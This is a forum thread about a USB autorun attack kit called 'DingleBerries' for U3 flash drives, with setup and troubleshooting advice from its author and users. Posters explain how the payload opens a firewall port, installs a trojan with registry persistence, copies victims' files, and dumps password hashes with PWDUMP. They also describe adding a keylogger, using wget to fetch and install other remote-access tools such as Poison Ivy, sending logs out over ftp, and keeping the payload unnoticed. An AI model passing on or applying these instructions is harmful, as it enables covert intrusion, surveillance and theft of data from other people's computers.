Jump to content

Tools


DingleBerries

Recommended Posts

0x3, I am a bit confused about your question. Are you talking about installing asp shells and disabling firewall? I do not have any Server 2003 VMs atm, but that is easy to get ;). I was thinking about rewriting the backdoor in the future to support more things, and making it drop a file should be easy, i.e. have it sitting in the code then print it out to a text document named shell.php. It may take me a while, school and what not, but I will try to release what I can when I can(not all of my tools are here :, save the good stuff for my self :P).

Link to comment
Share on other sites

  • Replies 56
  • Created
  • Last Reply

Top Posters In This Topic

Let me explain it a bit more in detail.

There are two folders(CD, Flash). The Flash folder has 2 files(2 exes and a bat). Autorun runs > Leroy Jenkins then opens a port in the firewall, copies the trojan(makPMF i think was the name), and then runs the bat script that searches for the drive containing DingleBerries.exe.

On the flash side, just put all the files on the root of your drive.Dingleberries.exe gabs some info from the pc, writes the computers info to a txt file, rights the registry value to autorun the trojan, and then calls slurp.exe(you can remove slup and replace it with PWDUMP just rename it slurp.exe) Slurp looks in the ini to find out what file types you want slurped up and puts then in a folder like so, COMPUTERNAME > SLURPED FILES. One issue is that if the folder already exist it will stop everything. The client.pyw will require you have python installed. Go to one of the folders that has the computer info dump and type that IP into the client, you can now send commands.

To use this you will need to make an ISO of the cd folder and flash that to the u3 side.

Thanks great answer.

Just a few more noobish questions:

- I do know how to create an ISO file but how do I flash the usb-drive with it?

- Does leroy jenkis work with an router that blocks ports?

- Is it possible to get the usb-drive not showing up options when inserting it what to do with it?

I tried out the latest version of slurp and it worked great and really quick.

Does it only seach in C:\ and is it possible to seach for specific names also along with the other seach?

What Im I possible to do with the python trojan?

This release was amazing, just tell me if I could help you somehow.

Regards Humper

Link to comment
Share on other sites

[sic] but how do I flash the usb-drive with it?

Universal Customizer. There are a few versions floating around. The newest version works in vista as well as on 4GB< drives.

Does leroy jenkis work with an router that blocks ports

leroy jenkis just starts the payload, makPNF.exe is the actual Trojan and atm it does not. Later I may release a UDP version that will work on routers that block ports.

Is it possible to get the usb-drive not showing up options when inserting it what to do with it?

I have no idea what that even means.

Does it only seach in C:\ and is it possible to seach for specific names

It searches HOME DRIVE/HOMEPATH, so if your drive letter is F:\ it will still work. The rest of the payload relies on the drive being the C:\ drive but that isnt a hard fix, remember this was done in less than a day. Right now it will only do extensions, Adding complete file names never really crossed my mind, i will look into it though.

Cheers!

Link to comment
Share on other sites

This is probably a dumb question... but how do I protect my computer from the programs once I put it on my U3?

Because the current switchblade's payload still attacks my computer when I set it to protect my computer against it. O.o

EDITTTTT scratch that!!! I'll just turn my auto-run off >.<

Link to comment
Share on other sites

Let me explain it a bit more in detail.

There are two folders(CD, Flash). The Flash folder has 2 files(2 exes and a bat). Autorun runs > Leroy Jenkins then opens a port in the firewall, copies the trojan(makPMF i think was the name), and then runs the bat script that searches for the drive containing DingleBerries.exe.

On the flash side, just put all the files on the root of your drive.Dingleberries.exe gabs some info from the pc, writes the computers info to a txt file, rights the registry value to autorun the trojan, and then calls slurp.exe(you can remove slup and replace it with PWDUMP just rename it slurp.exe) Slurp looks in the ini to find out what file types you want slurped up and puts then in a folder like so, COMPUTERNAME > SLURPED FILES. One issue is that if the folder already exist it will stop everything. The client.pyw will require you have python installed. Go to one of the folders that has the computer info dump and type that IP into the client, you can now send commands.

To use this you will need to make an ISO of the cd folder and flash that to the u3 side.

Just a few more questions if I may... :P

With the client.pyw do I need to save that to my computer too... To access the other computer? I'm still not 100% sure how that works.

With the keylogger.exe... Do I just add that to the root of my flash side too? (And do I need to edit the .bat to actually get it to run?) And can I access the logs of the keylogger from my house using the trojan?

Sorry for asking so many questions... I'm new and I'm trying to soak in as much as possible... Everyone has to start somewhere I guess? >.<

Thanks. :)

Link to comment
Share on other sites

Just a few more questions if I may... :P

With the client.pyw do I need to save that to my computer too... To access the other computer? I'm still not 100% sure how that works.

With the keylogger.exe... Do I just add that to the root of my flash side too? (And do I need to edit the .bat to actually get it to run?) And can I access the logs of the keylogger from my house using the trojan?

Sorry for asking so many questions... I'm new and I'm trying to soak in as much as possible... Everyone has to start somewhere I guess? >.<

Thanks. :)

If I understood it right you need to download python and then just write testconnection (IP ADRESS).

For the rest just read the hole topic and you will get awnsers to that.

Regards Humper

Link to comment
Share on other sites

If I understood it right you need to download python and then just write testconnection (IP ADRESS).

For the rest just read the hole topic and you will get awnsers to that.

Regards Humper

Ok thanks.

Link to comment
Share on other sites

Once python is installed, windows or linux, then you double click the pyw(windows) or ./client.pyw(linux). A gui will pop up asking to the IPaddress and below that there is a place to send commands. If you want to modify the payload add wget.exe to the CD partition and have it copy to the System root, best if you rename it, then you can download files from online and execute them via cmd. This is useful if you have a better RAT, i.e Poison IVY, and want to install the server to the remote computer.

To add wget just modify the batch file

xcopy wget.exe C:\Windows\System32

And if you add the keylogger to it Windows has a built in ftp command. That means you can remotely upload the log file to some ftp server and read the contents without going back. Just like in linux there are a lot of things that can be done via command line in windows, just read and research. THE MORE YOU KNOW!

Also I havent tested it, but does the batch file show a windows when the drive is inserted? Or are there any signs, other than opening Task Manager, that the payload is running?

Link to comment
Share on other sites

I'm getting an error with trying to create the new CD partition ISO with Universal Customizer...

So I'm wondering what I'm doing wrong...

I archived all the files in the CD folder and named the .rar U3CUSTOM... then I put the .rar into the BIN folder in the UC and ran it and got the error

Failed to access your U3 smart drive. U3 Customizer will now shut down.

And this is the error that comes up with the log in U3

[MUSK] [408][01:40:22]: CCDServiceImpl::burnImage - failed to open image file C:\UC\bin\U3CUSTOM.ISO

I've tried many different ways to fix it... The older versions of my switchblade still work... so I dunno. If anyone can help... then yeah. :D I'll bake you brownies. <}

Link to comment
Share on other sites

Ok I've flashed the drive and added the "flash" folder to the root.

But I still don't really get what client I should use for the keylogger.

Also where does it save the IP and the computer info?

Also how do I remove all of the files, keylogger and so that I enter to the computer?

Regards Humper

Link to comment
Share on other sites

The FLASH folders CONTENTS go in the root of the flash drive, not the folder its self. There is no key logger in the payload... If you read the code in the bat, which runs the shit from flash, will will see how most of it works.. That is why I encouraged people to add to this. If you cant figure it out then I dont really care, It has worked on all the systems I have tested it on.

Link to comment
Share on other sites

http://rapidshare.com/files/216560498/U3.iso

THIS ISO DOES NOT WORK. REMEMBER YOU HAVE TO CHANGE THE BAT FILE!

Send me a message w/ an address and I'll make you the brownies ^.^

When I used this ISO just how it is it worked just fine... but when I started adding the keylogger & other extra .exes to the .bat... it is giving me same error as before. O.o What the hell am I doing wrong? I guess I just don't understand how the u3 partiton works... I dunno...

Link to comment
Share on other sites

Send me a message w/ an address and I'll make you the brownies ^.^

When I used this ISO just how it is it worked just fine... but when I started adding the keylogger & other extra .exes to the .bat... it is giving me same error as before. O.o What the hell am I doing wrong? I guess I just don't understand how the u3 partiton works... I dunno...

Its running one extra command; cd SYS VOLUME. I have a person payload that uses that folder. So If you want you can make a folder named SYS VOLUME and put all the other stuff in there and I will work the same way. To add the keylogger add this to the begining of the batch file

xcopy keylogger.exe C:\\Where\ever\

it whould copy it and then carry out the rest of the instructions

Link to comment
Share on other sites

Its running one extra command; cd SYS VOLUME. I have a person payload that uses that folder. So If you want you can make a folder named SYS VOLUME and put all the other stuff in there and I will work the same way. To add the keylogger add this to the begining of the batch file

xcopy keylogger.exe C:\\Where\ever\

it whould copy it and then carry out the rest of the instructions

I'm not having a problem with the programs or anything... Universal customizer wont add the ISO to the CD partition of the U3 device when I change the .bat file... when I don't mess with anything and use the one that you made it works just fine...

Link to comment
Share on other sites

i've got a weird problem here. I've got everything working great but the slurper only copies the last extension i put into the slurp.ini file ... my ini file looks like this:

#Place file types here

[File Types]

Extensions = .gif

Extensions = .jpg

Extensions = .pdf

Extensions = .txt

/quote]

but it only slurps the .txt file

on other versions of your slurper it worked without problems

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...